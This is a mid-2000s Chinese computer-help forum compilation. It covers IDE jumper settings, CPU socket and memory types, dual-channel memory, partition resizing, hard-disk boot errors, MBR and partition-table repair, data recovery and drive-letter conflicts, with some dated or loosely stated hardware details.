--------------------------------------------------------------------------------
作者: xueASP　　时间: 2006-6-29 13:04

晕 我知道了 你的电脑是不是只有一个IDE接口的吧， 上面的时候要说清楚嘛！不然很让人产生误会的，
一个IDE借口，一条数据线接两个IDE接口设备 要跳好主从线的！
--------------------------------------------------------------------------------
作者: yuehao1979　　时间: 2006-6-29 13:06

对！是我的问题～谢谢了，真的没想到，原来还是好好的，我又没有碰过，太奇怪了
】

--------------------------------------------------------------------------------

《我是网管》论坛，打造中国网管第一品牌！

Ⅰ题目：CPU插槽类型分为SocketA Socket370 Socket478 Socket603 Socket604 Socket754 Socket775 Socket939 Socket940
        这些类型都代表什么意思???
答：Socket478是Intel P4系列的接口
    Socket603 Socket604是Intel的Xeon（至强）处理器的接口，603、604分别对应400M、533MFSB
    Socket754是AMD“低端”的Athlon64系列处理器的接口
    Socket775，这个称呼其实是错误的，应该是LGA775，是Intel为了搭配最新的Prescott核心推出的
    Socket939是AMD高端的Athlon64 FX系列处理器的接口
    Socket940是AMD服务器级的Opteron（皓龙）处理器的接口
答：CPU插槽类型是针对不同的处理器的.
    SocketA处理器绝唱：Sempron 2800+
    Socket370 是P3\Tualtin赛
    Socket478 Pentium IV和Celeron IV
    Socket603 Intel 奔腾4 XEON 较老,2.0 FSB 400MHz
    Socket604 Intel 奔腾4 XEON 较新如Intel 奔腾4 XEON3.0GHz FSB 533MHz
    Socket754 闪龙3100＋开始采用Socket754接口，采用Paris核心
    Socket-775 Pentium4 Extreme Edition 3.4 GHz
    Socket939 AMDK8处理器,我估计此规格将成为AMD今后一段时间的统一标准.
    Socket940 AMD服务器平台的Opteron.
ＰＳ:AMD:A,754,939,940
     Intel:370,478,603,604,775
     A的就是462主要是ATHLON XP/DURON/SEMPRON（462）
     754主要是ATHLON 64（1M单通，512K单通）
     939主要是ATHLON 64（512K双通）部分新ATHLON 64 FX
     940主要是ATHLON 64 FX老版本和OPTERON
     370主要是COPPERMINE/TULATIN核心的PENTIUM 3
     478主要是NORTHWOOD/部分PRESSCOTT核心的PENTIUM 4/PENTIUM 4 XE/CELERON 4/CELERON D
     775主要是新版的PRESSCOTT核心的PENTIUM 4/CELERON D还有部分PENTIUM 4 XE
Ⅱ题目：主板内存插槽类型
        RDRAM
        ECC SDRAM
        ECC DDR SDRAM
        SDRAM
        DDR SDRAM
        DDR2
        这些都代表什么意思?
答：RDRAM 早期搭配Intel 850芯片组和423接口P4的双通道内存，当时价格昂贵，用来搭配Intel平台最高端的产品，因为423接口P4的失败而鲜为人知
    ECC SDRAM 带ECC校验的SD内存，一般为服务器使用，插口和普通SDRAM一致
    ECC DDR SDRAM 带ECC校验的DDR内存
    SDRAM 俗称普通内存（为了区别DDR内存），接口上为两个缺口
    DDR SDRAM DDR内存，与SDRAM的区别是一个始终周期内传输两次信号，接口为一个缺口，目前的主流
    DDR2 DDR二代，工作效率较DDR内存没有明显提升，价格昂贵，用来搭配最新的Intel 775接口平台和AMD 64位最高端平台
答：都是内存类型。
    RDRAM最早见与丽台的S800显卡，使用了8M的RDRAM最显存。后来台式电脑使用是从i820 chipset开始的，intel为了解决内存带宽的问题，为P3设计了i820芯片组，但是当时RDRAM过于昂贵，而且为普及速度很慢，后来intel为i820设计了可以使用SDRAM的转接芯片，但是出现了BUG，不得不回收，所以i820就被后来只支持SDRAM的815取代了。RDRAM采用串型协议，可以达到很高的频率来获得很高的性能。
    ECC SDRAM是带奇偶效验的内存，多用于服务器等对数据完整性要求比较高的场合，接口和普通的SDRAM一样，只不过多了一个ECC芯片。
    ECC DDR，就是DDR类型的内存采用了ECC容错技术的产物，和普通的DDR内存接口一样。
    SDRAM，就是同步动态存储器（SynchronousDRAM），从技术角度上讲，同步动态存储器是在标准动态存储器中加入同步控制逻辑(一个状态机)，利用一个单一的系统时钟同步所有的地址数据和控制信号。所以性能比老的EDO等内存强的多。在i430时代开始进入桌面市场，在440LX/BX时代达到高潮。
    DDR SDRAM，就是双倍速率的SDRAM（Dual Date Rate SDRSM），它在时钟速度不变的情况下，可以在时钟的上升和下降沿传输数据，等于速度提高了一倍。
    DDR2，可以在一个时钟周期内传输4次数据，所以它可以在较低的频率下达到较高的性能，比如同样是等效400M，SDRAM就要运行在400M的频率下，而DDR只要运行在200M的速度下，而DD2更少，只要100M就可以了。但是DDR2的延迟时间要比DDR高。
    以上内存的接口不同，而且电压也不相同。除了RDRAM是串型外，其它类型的内存全是并行的。
答：内存所采用的内存类型，不同类型的内存传输类型各有差异，在传输率、工作频率、工作方式、工作电压等方面都有不同。目前市场中主要有的内存类型有SDRAM、DDR SDRAM和RDRAM三种，其中DDR SDRAM内存占据了市场的主流，而SDRAM内存规格已不再发展，处于被淘汰的行列。RDRAM则始终未成为市场的主流，只有部分芯片组支持，而这些芯片组也逐渐退出了市场，RDRAM前景并不被看好。
    SDRAM：SDRAM，即Synchronous DRAM（同步动态随机存储器），曾经是PC电脑上最为广泛应用的一种内存类型，即便在今天SDRAM仍旧还在市场占有一席之地。既然是“同步动态随机存储器”，那就代表着它的工作速度是与系统总线速度同步的。SDRAM内存又分为PC66、PC100、PC133等不同规格，而规格后面的数字就代表着该内存最大所能正常工作系统总线速度，比如PC100，那就说明此内存可以在系统总线为100MHz的电脑中同步工作。

    与系统总线速度同步，也就是与系统时钟同步，这样就避免了不必要的等待周期，减少数据存储时间。同步还使存储控制器知道在哪一个时钟脉冲期由数据请求使用，因此数据可在脉冲上升期便开始传输。SDRAM采用3.3伏工作电压，168Pin的DIMM接口，带宽为64位。SDRAM不仅应用在内存上，在显存上也较为常见。
    DDR SDRAM：严格的说DDR应该叫DDR SDRAM，人们习惯称为DDR，部分初学者也常看到DDR SDRAM，就认为是SDRAM。DDR SDRAM是Double Data Rate SDRAM的缩写，是双倍速率同步动态随机存储器的意思。DDR内存是在SDRAM内存基础上发展而来的，仍然沿用SDRAM生产体系，因此对于内存厂商而言，只需对制造普通SDRAM的设备稍加改进，即可实现DDR内存的生产，可有效的降低成本。
    SDRAM在一个时钟周期内只传输一次数据，它是在时钟的上升期进行数据传输；而DDR内存则是一个时钟周期内传输两次次数据，它能够在时钟的上升期和下降期各传输一次数据，因此称为双倍速率同步动态随机存储器。DDR内存可以在与SDRAM相同的总线频率下达到更高的数据传输率。
    与SDRAM相比：DDR运用了更先进的同步电路，使指定地址、数据的输送和输出主要步骤既独立执行，又保持与CPU完全同步；DDR使用了DLL(Delay Locked Loop，延时锁定回路提供一个数据滤波信号)技术，当数据有效时，存储控制器可使用这个数据滤波信号来精确定位数据，每16次输出一次，并重新同步来自不同存储器模块的数据。DDL本质上不需要提高时钟频率就能加倍提高SDRAM的速度，它允许在时钟脉冲的上升沿和下降沿读出数据，因而其速度是标准SDRA的两倍。
    从外形体积上DDR与SDRAM相比差别并不大，他们具有同样的尺寸和同样的针脚距离。但DDR为184针脚，比SDRAM多出了16个针脚，主要包含了新的控制、时钟、电源和接地等信号。DDR内存采用的是支持2.5V电压的SSTL2标准，而不是SDRAM使用的3.3V电压的LVTTL标准。
    RDRAM：RDRAM（Rambus DRAM）是美国的RAMBUS公司开发的一种内存。与DDR和SDRAM不同，它采用了串行的数据传输模式。在推出时，因为其彻底改变了内存的传输模式，无法保证与原有的制造工艺相兼容，而且内存厂商要生产RDRAM还必须要加纳一定专利费用，再加上其本身制造成本，就导致了RDRAM从一问世就高昂的价格让普通用户无法接收。而同时期的DDR则能以较低的价格，不错的性能，逐渐成为主流，虽然RDRAM曾受到英特尔公司的大力支持，但始终没有成为主流。
    RDRAM的数据存储位宽是16位，远低于DDR和SDRAM的64位。但在频率方面则远远高于二者，可以达到400MHz乃至更高。同样也是在一个时钟周期内传输两次次数据，能够在时钟的上升期和下降期各传输一次数据，内存带宽能达到1.6Gbyte/s。
    普通的DRAM行缓冲器的信息在写回存储器后便不再保留，而RDRAM则具有继续保持这一信息的特性，于是在进行存储器访问时，如行缓冲器中已经有目标数据，则可利用，因而实现了高速访问。另外其可把数据集中起来以分组的形式传送，所以只要最初用24个时钟，以后便可每1时钟读出1个字节。一次访问所能读出的数据长度可以达到256字节
    ECC是Error Checking and Correcting（错误检查和纠正）的简写。它广泛应用于各种领域的计算机指令中。而本文主要讲解ECC在计算机内存中的应用。ECC和奇偶校验（Parity）类似。然而，在那些Parity只能检测到错误的地方，ECC实际上可以纠正绝大多数错误。经过内存的纠错，计算机的操作指令才可以继续执行。
    DDR 也就是“双倍数据传输”（double datarate）的缩写，这几年来一直是PC内存的主流标准。目前DDR已达到400MHz，DDR2将以533MHz起跳，并在年底前达到667MHz.更高的时脉将可达到更高的数据传输，提高PC性能。同时DDR2也会更省电。DDR2的总线宽度与DDR 64 bit的宽度完全相同，但前者由于运行在双通道模式，因此能够提供高达128 bits的总线宽度。在目前来说，DDR2和DDR3都已经开始被使用在某些对内存带宽需求较高的高端显示卡中。目前我们在市场上见到的DDR2，却并非我们将要看到量产的DDR2，因此目前PC-4300和PC2-4300的性能，未来将会有极大的改观，要知道内存控制器正在进行重大的改进。
Ⅲ题目：哪些主板的芯片组支持双通道内存???
答:Intel、nVIDIA、VIA的芯片组吧
   Intel方面目前主流的是865、875系列
   VIA方面目前在Intel平台是PT880，AMD的32位平台是KT880，64位的是K8T890
   nVIDIA方面目前只有AMD平台的产品，32位的主流是nForce2系列，64位的有nForce3 250和马上大量上市的nForce4系列
Ⅳ题目：什么是内存双通???
答：双通道内存技术，就是在北桥(又称之为GMH)芯片组里制作两个内存控制器，这两个内存控制器是可以相互独立工作的。在这两个内存通道上，CPU可以分别寻址、读取数据，从而可以使内存的带宽增加一倍，数据存取速度也相应增加一倍(理论上是这样)。
    目前流行的双通道DDR内存构架是在两个64bitDDR内存控制器构筑而成的，其带宽可以达到128bit，但工作方式不同于单通道128bit的内存控制技术。因为双通道体系的两个内存控制器是独立的、具备互补性的智能内存控制器，两个内存控制器都能够在彼此间零等待时间的情况下同时运作。例如：当控制器B准备进行下一次存取内存的时候，控制器 A就在读/写主内存，反之亦然。两个内存控制器的这种互补“天性”可以让有效等待时间缩减50%，从而使内存的带宽翻了一翻。
    双通道DDR的两个内存控制器在功能上是完全一样的，并且两个控制器的时序参数都是可以单独编程设定的。这样的灵活性可以让用户使用两条不同构造、容量、速度的DIMM内存条，此时双通道DDR简单地调整到最低的密度来实现128bit带宽，允许不同密度/等待时间特性的DIMM内存条可以可靠地共同运作。
    简而言之，双通道技术是一种关系到主板芯片组的技术，与内存自身无关，只要厂商在芯片内部整合两个内存控制器，就可以构成双通道DDR系统。而主板厂商只需要按照内存通道将DIMM分为Channel 1与Channel 2，用户也需要成双成对地插入内存，就如同RDRAM那样。如果只插单根内存，那么两个内存控制器中只会工作一个，也就没有了双通道的效果了。
    如果只插单根内存，那么两个内存控制器中只会工作一个
    双通道内存控制技术可以非常有效的提高内存带宽，特别是那些需要同内存频繁交换数据的软件和整合有图形核心(整合显卡)的芯片组。在865G这样整合有显卡的双通道主板上，双通道内存控制技术所带来的高带宽，可以帮助整合显卡在划分主存做为显存的时候，得到更高的数据带宽，而显存的数据带宽正是制约一块显卡性能发挥的瓶颈所在。


各分区之间的容量能在不损害数据的前提下进行调整吗？

《一键清理系统垃圾》

各分区之间的容量能在不损害数据的前提下进行调整吗？

    （广东 温建东）答：可以。用著名的硬盘分区软件PowerQuest PartitionMagic可以做到这一点。下面以PowerQuest PartitionMagic 8.0（Build 1242）简装汉化版为例进行说明：

    运行程序，在程序界面的左边可以看到一个柱状横条，上面分成几个部分，分别是你的硬盘的各个分区。如果想从D盘上“转移”给C盘5GB的空间，那么可以在显示D盘的柱面上点鼠标右键，选“调整容量/移动分区”，在“自由空间之前”的选项填“5120”，然后点确认；在显示C盘的柱面上点右键，选“调整容量/移动分区”，在“自由空间之后”的选项填“0”，然后确认；点程序界面左下角的“应用”，按提示重启之后，就可以发现原来的C盘已经多了5GB的可用空间，而且C盘和D盘的数据都没有受到损坏。


固定不当引起硬盘故障

《一键清理系统垃圾》

固定不当引起硬盘故障

《中国电脑教育报》初夏旭日

    新买一台电脑使用一段时间后，某日开机主板自检通过，硬盘发出规律的“格格”声（工作噪音），但是报告未找到操作系统。怎么会这样？插入启动盘，在BIOS中设为软盘启动并重启电脑，可进入DOS状态，进C盘dir列出目录，隔了很长时间后报错，而其他分区内的数据完好无损。格式化重装Windows 98，在DOS下打入Format C:，格式化不到10%就报告有坏道而死机。这倒是麻烦，手头没有任何工具软件，只能等明天再说。

    第二天在别的电脑上下载了DM（硬盘管理）程序，开机后找不到硬盘，可硬盘一直有规律的工作噪音。难道是接触问题？于是将硬盘数据线拔插一遍开机，终于检测到硬盘，可是分区信息完全丢失了，只有忍痛用DM格式化后安装了Windows 98，一切正常，终于解决了问题。

    然而第三天又出现了相似的症状，从此硬盘跟我捉起了迷藏，经常在BIOS中检测硬盘容量不正确，不是57GB就是80GB，一退出硬盘检测程序就死机，拔插后有可能正确识别，但下次开机多半又没有了，把我搞得焦头烂额。N天后无意经过五金商店，忽然想起装硬盘时用的是组合螺丝刀，因为质量不好，固定螺丝没拧紧，抱着死马当做活马医的想法买了一把十字花螺丝刀，一试之下发现固定硬盘的四个螺丝中竟有三个未拧紧。确认硬盘固定好之后开机，硬盘检测正确，DM格式化后一切正常，到现在也没有再出现故障。


故障硬盘数据拯救全攻略

《一键清理系统垃圾》

故障硬盘数据拯救全攻略

    为了有效地保存硬盘中的数据，除了经常性地进行备份工作以外，还要学会在硬盘出现故障时如何救活硬盘，或者从坏的区域中提取出有用的数据，把损失降到最小程度。

    系统不认硬盘

    系统从硬盘无法启动，从A盘启动也无法进入C盘，使用CMOS中的自动监测功能也无法
发现硬盘的存在。这种故障大都出现在连接电缆或IDE端口上，硬盘本身故障的可能性不大，可通过重新插接硬盘电缆或者改换IDE口及电缆等进行替换试验，就会很快发现故障的所在。如果新接上的硬盘也不被接受，一个常见的原因就是硬盘上的主从跳线，如果一条IDE硬盘线上接两个硬盘设备，就要分清楚主从关系。

    CMOS引起的故障

    CMOS中的硬盘类型正确与否直接影响硬盘的正常使用。现在的机器都支持“IDE Auto Detect”的功能，可自动检测硬盘的类型。当硬盘类型错误时，有时干脆无法启动系统，有时能够启动，但会发生读写错误。比如CMOS中的硬盘类型小于实际的硬盘容量，则硬盘后面的扇区将无法读写，如果是多分区状态则个别分区将丢失。还有一个重要的故障原因，由于目前的IDE都支持逻辑参数类型，硬盘可采用“Normal,LBA,Large”等，如果在一般的模式下安装了数据,而又在CMOS中改为其它的模式，则会发生硬盘的读写错误故障，因为其映射关系已经改变，将无法读取原来的正确硬盘位置。

    主引导程序引起的启动故障

    主引导程序位于硬盘的主引导扇区，主要用于检测硬盘分区的正确性，并确定活动分区，负责把引导权移交给活动分区的DOS或其他操作系统。此段程序损坏将无法从硬盘引导，但从软驱或光驱启动之后可对硬盘进行读写。修复此故障的方法较为简单，使用高版本DOS的FDISK最为方便，当带参数/mbr运行时，将直接更换(重写)硬盘的主引导程序。实际上硬盘的主引导扇区正是此程序建立的，FDISK.EXE之中包含有完整的硬盘主引导程序。虽然DOS版本不断更新，但硬盘的主引导程序一直没有变化，从DOS 3.x到Windos 95的DOS，只要找到一种DOS引导盘启动系统并运行此程序即可修复。

    分区表错误引发的启动故障

    分区表错误是硬盘的严重错误，不同的错误程度会造成不同的损失。如果是没有活动分区标志，则计算机无法启动。但从软驱或光驱引导系统后可对硬盘读写，可通过FDISK重置活动分区进行修复。

    如果是某一分区类型错误，可造成某一分区的丢失。分区表的第四个字节为分区类型值，正常的可引导的大于32MB的基本DOS分区值为06，而扩展的DOS分区值是05。很多人利用此类型值实现单个分区的加密技术，恢复原来的正确类型值即可使该分区恢复正常。

    分区表中还有其它数据用于记录分区的起始或终止地址。这些数据的损坏将造成该分区的混乱或丢失，可用的方法是用备份的分区表数据重新写回，或者从其它的相同类型的并且分区状况相同的硬盘上获取分区表数据。

    恢复的工具可采用NU等工具软件，操作非常方便。当然也可采用DEBUG进行操作，但操作繁琐并且具有一定的风险。

    分区有效标志错误的故障

    在硬盘主引导扇区中还存在一个重要的部分，那就是其最后的两个字节：“55aa”，此字节为扇区的有效标志。当从硬盘、软盘或光盘启动时，将检测这两个字节，如果存在则认为有硬盘存在，否则将不承认硬盘。此处可用于整个硬盘的加密技术，可采用DEBUG方法进行恢复处理。另外，当DOS引导扇区无引导标志时，系统启动将显示为：“Mmissing Operating System”。方便的方法是使用下面的DOS系统通用的修复方法。

    DOS引导系统引起的启动故障

    DOS引导系统主要由DOS引导扇区和DOS系统文件组成。系统文件主要包括IO.SYS、MSDOS.SYS、COMMAND.COM，其中COMMAND.COM是DOS的外壳文件，可用其它的同类文件替换，但缺省状态下是DOS启动的必备文件。在Windows 95携带的DOS系统中，MSDOS.SYS是一个文本文件，是启动Windows必须的文件，但只启动DOS时可不用此文件。DOS引导出错时，可从软盘或光盘引导系统后使用SYS C:命令传送系统，即可修复故障，包括引导扇区及系统文件都可自动修复到正常状态。

    FAT表引起的读写故障

    FAT表记录着硬盘数据的存储地址，每一个文件都有一组FAT链指定其存放的簇地址。FAT表的损坏意味着文件内容的丢失。庆幸的是DOS系统本身提供了两个FAT表，如果目前使用的FAT表损坏，可用第二个进行覆盖修复。但由于不同规格的磁盘其FAT表的长度及第二个FAT表的地址也是不固定的，所以修复时必须正确查找其正确位置，一些工具软件如NU等本身具有这样的修复功能，使用也非常的方便。采用DEBUG也可实现这种操作，即采用其m命令把第二个FAT表移到第一个表处即可。如果第二个FAT表也损坏了，则也无法把硬盘恢复到原来的状态，但文件的数据仍然存放在硬盘的数据区中，可采用CHKDSK或SCANDISK命令进行修复，最终得到*.CHK文件，这便是丢失FAT链的扇区数据。如果是文本文件则可从中提取出完整的或部分的文件内容。

    目录表损坏引起的引导故障

    目录表记录着硬盘中文件的文件名等数据，其中最重要的一项是该文件的起始簇号。目录表由于没有自动备份功能，所以如果目录损坏将丢失大量的文件。一种减少损失的方法也是采用CHKDSK或SCANDISK程序恢复的方法，从硬盘中搜索出*.CHK文件，由于目录表损坏时仅是首簇号丢失，每一个*.CHK文件即是一个完整的文件，把其改为原来的名字即可恢复大多数文件。

    误删除分区时数据的恢复

    当用FDISK删除了硬盘分区之后，表面上是硬盘中的数据已经完全消失，在未格式化时进入硬盘会显示为无效驱动器。如果了解FDISK的工作原理，就会知道FDISK只是重新改写了硬盘的主引导扇区(0面0道1扇区)中的内容，具体说就是删除了硬盘分区表信息，而硬盘中的任何分区的数据均没有改变。可仿照上述的分区表错误的修复方法，即想办法恢复分区表数据即可恢复原来的分区及数据。如果已经对分区格式化，在先恢复分区后，可按下面的方法恢复分区数据。

    误格式化硬盘数据的恢复

    在DOS高版本状态下，FORMAT格式化操作在缺省状态下都建立了用于恢复格式化的磁盘信息，实际上是把磁盘的DOS引导扇区、FAT分区表及目录表的所有内容复制到了磁盘的最后几个扇区中(因为后面的扇区很少使用)，而数据区中的内容根本没有改变。这样通过运行UNFORMAT命令即可恢复。另外DOS还提供了一个MIROR命令用于记录当前磁盘的信息，供格式化或删除后的恢复使用，此法也比较有效。

电脑工作室　QQ 3149886


错接鼠标键盘的故障

《一键清理系统垃圾》

错接鼠标键盘的故障

《中国电脑教育报》卢均峰

    从1999年我有了自己的爱机到现在已经四年多了，对计算机的认识不说精通，也算是略知一二了。但最近遇到的问题，真是有点丈二和尚——摸不着头脑。

    事情是这样的，今年元旦后我把自己的爱机升级了，将换下的VIA 694X芯片组杂牌主板和Celeron 733MHz卖了280元了事。新装上的美达815EB主板和Tualatin 1.3GHz CPU感觉确实快了很多。在商家柜台装机时，玩游戏、运行软件等等一切都很顺畅，没有出现任何问题。可回到了家问题就接踵而至——电脑不能重新启动，一重启就会默认地进入安全模式。强行进入正常模式查看硬件管理，无任何惊叹号，使用也无异常。爱机怎么了，难道是水土不服？不会是新买的内存和老电脑用的内存不兼容吧？想到这儿，我以最快的速度拔下旧内存，再开机，问题还是没有解决。到这个地步，我也无计可施了。因为夜色已深、又很劳累，我决定明早先重装系统再说。

    一觉醒来，突然想起自己的那些软件在朋友处，他家又很远，怎么办？再看看硬件吧，我又把机箱内所有的插卡和接线重做了一遍。当我重插键盘和鼠标时，突然看到由于昨晚光线较暗，鼠标和键盘的接口插反了，一切的问题原来就在这儿，真是气死我了！我这只朋友眼中的老鸟怎么也犯了如此低级的错误？插好键盘和鼠标，开机一切正常，又可以接着踢我的FIFA了。

    此事让我惭愧了许久，在这里我也想提醒各位老鸟、菜鸟一声，硬件的安装马虎不得，一定要细心检查，毕竟这和电视机还有不少的区别哪！


打开硬盘分区出错

《一键清理系统垃圾》

打开硬盘分区出错

    问：我用Windows优化大师对系统作了优化后，不知道是误操作还是怎么了，发现E盘图标变成优化大师图标，双击E盘会进入MS-DOS方式，单击右键然后选“打开”才能进入E盘，请问如何让E盘恢复正常？

    答：打开注册表编辑器，找到HKEY_CLASSES_ROOT\Drive，把右边的默认值里面的内容删除。图标的修改是：找到HKEY_CLASSES_ROOT\Drive\DefaultIcon，修改右边的图标为你需要的图标。以Windows XP为例，这个键值是：%SystemRoot%\System32\shell32.dll，8(不同的操作系统，该键值是不同的)。


解决多硬盘盘符混乱问题

《一键清理系统垃圾》

解决多硬盘盘符混乱问题

    现象：在安装了第二块硬盘后，老硬盘与新硬盘上的盘符会出现盘符交叉的现象，在调用文件的时候就会出现很多麻烦，甚至导致某些程序无法使用。

方法：
    1.屏蔽硬盘法
将两块硬盘设置好主从关系并正确连接，然后开机进入BIOS设置程序。在“Standard CMOS Features”选项中将从盘参数项设为“NONE”，屏蔽掉从盘。在“Advanced BIOS Features”选项中设置主盘为启动硬盘。保存设置后重新启动，则硬盘盘符就会按照主、从盘的分区顺序排列好了。这种方法的缺点是从盘只能在Windows下正常使用，在纯DOS模式下无法识别从盘。

2.重新分区法
设置好主从关系并正确连接硬盘后，使用任一款分区软件将从盘全部划为逻辑分区，则从盘的盘符就会按顺序排在主盘后面。(陈会安)

3.Win 9x：使用Letter Assigner
Letter Assigner能够任意指定硬盘的盘符。启动Letter Assigner，在Letter Assigner的工具栏下方列出了“A～Z”26个盘符，其中黄色表示当前可以选择使用，灰色表示当前不可使用。在主窗口中选中需要修改的盘符，然后从盘符栏中选择修改后的盘符，执行“文件→保存”命令，重新启动计算机即可。

在操作过程中，如果需要放弃修改，只要执行“编辑→恢复原版”或者按下“Ctrl+Z”组合键即可。一般情况下系统盘的盘符不能修改，否则可能造成系统启动错误。当修改系统盘的盘符时，Letter Assigner会弹出一个提示窗口。(LanFu)

4.Win 2000/XP：操作系统设置法
以上几种方法建议大家只在Win 9x\Me下使用，而在 Win 2000\Me下硬盘的混乱问题已经得到解决，并且可以通过设置指定驱动器名。

以Win 2000为例，操作步骤是：打开“控制面板→管理工具→计算机管理”，接着展开“存储→磁盘管理”，右键选中需要调整的分区，选择“更改驱动器名和路径”选项，点击“编辑”按钮，然后进行调整工作即可。

注意：所设定的驱动器名称只能是未使用过的；当设定完成后，会弹出警告窗口，说该操作可能造成驱动器停止，不用理会，点击“确定”即可。(任亚维)

5.利用PartitionMagic
PartitionMagic(分区魔术师)可以对硬盘进行重新分区、格式化、复制分区等操作，使用它修改盘符的操作方法如下：

启动PartitionMagic，鼠标右击需要修改的盘符，在快捷菜单中选择“高级→修改驱动器盘符”，然后在弹出的“更改驱动器盘符”窗口中选择新的盘符，单击“确定”按钮，接着选择“常规→应用改变”命令，按照提示重新启动即可。

另：

    (1)Windows 2000/XP
    Windows 2000/XP一般不会产生盘符交叉的问题，但前提是安装Windows 2000、XP时只安装了一块硬盘，安装结束后才能挂上第二块硬盘，假如是在添加第二块硬盘后安装Windows 2000/XP的话，那么仍然会产生盘符交叉，而且这是永久性的，即使取下第二块硬盘也无济于事。

    不过，我们可以进入“控制面板→管理工具→计算机管理”窗口，在“计算机管理”下选择“磁盘管理”，选中相应分区，从右键菜单中执行“更改驱动器名和路径”命令，在图1对话框中点击“更改”按钮，然后重新指派一个驱动器号，再对其他分区重复执行该命令即可。

    (2)Windows 9x/Me
    有一个简单的办法可以解决这一问题，只须在BIOS设置程序中稍稍动些脑筋，将第一块硬盘设置为“User”或“Auto”，而将第二块硬盘设置为“NONE”，这样尽管BIOS无法发现这块硬盘，但Windows 9x/Me的即插即用功能会自动检测第二块硬盘，并自动分配盘符，令人担心的盘符交叉现象也就不复存在了。当然在纯DOS模式下第二块硬盘是看不到的。

    (3)Fdisk
    我们可以在执行Fdisk命令分区时，选中“Change current fixed disk drive”项，然后选中第二块硬盘将所有分区删除，再选择“Create Extended DOS Partition”将所有空间都分配给扩展分区使用，接下来再进行分区。也就是说不创建主分区只创建扩展分区，最后格式化就行了。


解决硬盘坏磁道问题

《一键清理系统垃圾》

解决硬盘坏磁道问题

问：我在格式化硬盘了出现提示：Recording current bad clusters, writing outfile allocation table. Calculating free space.是不是硬盘有坏簇？请问什么是坏簇和坏磁道？如何测试硬盘坏道是物理坏道还是逻辑坏道？物理坏道可修复吗？

答：硬盘格式化后，从逻辑上可以分为磁道(盘片上的同心圆)、扇区、柱面及簇等，其中簇是保存数据的基本单位。

硬盘的坏道分为物理坏道和逻辑坏道。物理坏道就是硬盘磁片本身受到损伤而导致的坏道。逻辑坏道是指磁片并未损伤，而是由于软件故障、病毒、非正常操作等造成的坏道假象，使得正常的扇区也被标示为坏扇区。据统计，有约40%的返修硬盘实际上没有任何物理故障，而是逻辑坏道在捣乱。因此各个公司也为此推出硬盘故障诊断工具软件：如希捷的SeaTools，昆腾的DPS，IBM的Drive Fitness，三星的Self-diagnostic，西部数据的Data Lifeguard Tools，迈拓的Maxtor Diagnostics Program等，这些工具可以帮助你判断硬盘是物理坏道还是逻辑坏道，因为只有真正的物理坏道软件才会报告。硬盘出现逻辑坏道，可以用以上硬盘厂商提供的Disk management或Norton utilities2000等软件中的工具软件来处理。而物理坏道，从理论上说是无法修复的。


硬盘引导型故障分析及排除

《一键清理系统垃圾》

硬盘引导型故障分析及排除

    硬盘是存储信息的重要介质，当硬盘出现故障后，迅速找准故障原因并排除是一项极其重要的工作，这里把病毒以外的故障分析如下，供参考：
    1、HDD controller failure(硬盘驱动器控制失败)
    POST程序向驱动器发出寻道命令后，驱动器在规定时间内，没有完成操作而产生超时错误。
    C:drive faiIure(硬盘C驱动失败)
    RUN SETUP UTTLITY(运行设置功能)
    Pressto Resume(按键重新开始)
    这种故障一般是因为硬盘的类型设置参数与原格式化时所用的参数不符。由于IDE硬盘的设置参数是逻辑参数，所以多数情况下由软盘启动后，C盘能够正常读写，只是不能启动。
    2、故障信息：lnvalid Drive Specification(无效的驱动器指定)
    这是说明你欲操作的分区或是逻辑驱动器在分区表中根本没有定义。如果一个分区或是逻辑驱动器在分区表里的相应表项已不存在，那么对于操作系统来说，该分区或逻辑驱动器也就不存在了。这种故障，问题一定首先出在分区表。修复这类故障，最简单的方法是事先做好分区表的备份，比如可用Pctools9.0的Bootsafe工具，当然也可以根据BPB表内的数据重新计算分区表，但比较复杂。
    3、Ertor Loading Operation System(装载操作系统错误)
    这类故障是在读取分区引导扇区(BOOT区)出错时提示的。可能的原因有：第一、分区表指示的分区起始物理地址不正确。比如，把分区表项第三字节(起始扇区号)由1改为0，即指示该分区的起始地址为指示磁头、指定磁道上的第0个扇区(此处为物理地址，扇区应由1开始)，INT 13H读盘失败后，即报此错。第二、分区引导扇区所在磁道的磁道标志和扇区ID损坏，找不到指定扇区。第三、驱动器读电路故障。这种情况比较少见，多数是随机性读错误，因为系统引导能进行到此处，至少说明已正确地读出了一个主引导扇区。
    4、不能进入系统，如有软驱，则由A驱引导，显示：
    DRIVE NOT READY ERROR(设备未准备好)
    Insert Boot Diskette in A：(插入引导盘到A驱)
    Press any key when ready(准备好后按任意键)
    BIOSPOST结束后，如果由硬盘引导，系统将固定读取硬盘0面0道1扇区，寻找主引导程序和分区表。所以，任何用软件的方法试图避开硬盘损坏的0面0道，而能够成功引导操作系统的作法，均是不可能的！除非你改写系统BIOS中INT 19H的有关指令。
    INT 19H读取主引导扇区的失败原因有：第一，硬盘读电路故障，使读操作失败，属硬件故障；第二，0面0道磁道格式和扇区ID逻辑或物理损坏，找不到指定的扇区；第三，读盘没有出错，但读出的MBR尾标不为“55AA”，系统认为MBR不正确，这是软故障。
    5、Non－System Disk or Disk Ertor
    Replace And press any key when ready(非系统盘或磁盘错误，重新放置后按任意键)
    DOS BOOT区中的引导程序执行后发现错误，报此信息。可能的原因：驱动器复位失败、根目录区第一扇区地址出界(在544M之后)、读盘出错。此类故障大多为软件故障，如果BPB表损坏，即用软盘启动后，硬盘不能正常读写，可以用NDD修复；如果BPB表完好，只需简单的SYS C：传送系统就引导驱动器，如果失败，则得示：
    Disk Boot Failure(磁盘引导失败)
    6、NO ROM BASIC(没有固化BASIC)
    SYSTEM HALT(系统停机)
    这是相当古老的机器才会出现的提示，主引导程序的作用，就是在分区表的四个表项中找出一个激活分区(可自举分区)。如果四个表项中没有一个是激活分区，系统就不知从何处引导操作系统，只能执行INT 188H，调用固化BASIC程序，如果没有固化BASIC，就会引起死机。最简单的修复方法，是用FDISK的第二项功能：Set activeparti－tion(设置激活分区)，去指定一个可自举分区。
    7、显示“Starting MS－DOS...”然后死机
    在恢复硬盘不能引导型软故障时，值得注意的最后一点，是CONFIG.SYS和AUTOEXC.BAT中的可执行文件本身已经损坏，使得系统在执行到此文件时死机，屏幕上提示：“Starting MS－DOS……”，然后死机。这个故障非常简单，但因为没有什么故障信息，一般人很容易误判为系统文件损坏。当出现这种现象，并且确信系统文件是完好的，就可以取掉这两文件，或者在屏幕上出现以上信息，快速按下键或按住键(中断CONFIG.SYS安装和AUTOEXEC.BAT执行)，或者按下键(单步执行CONFIG.SYSJ里的命令)，找出已经损坏的文件。
    8、Invalid Partition table(无效的分区表)
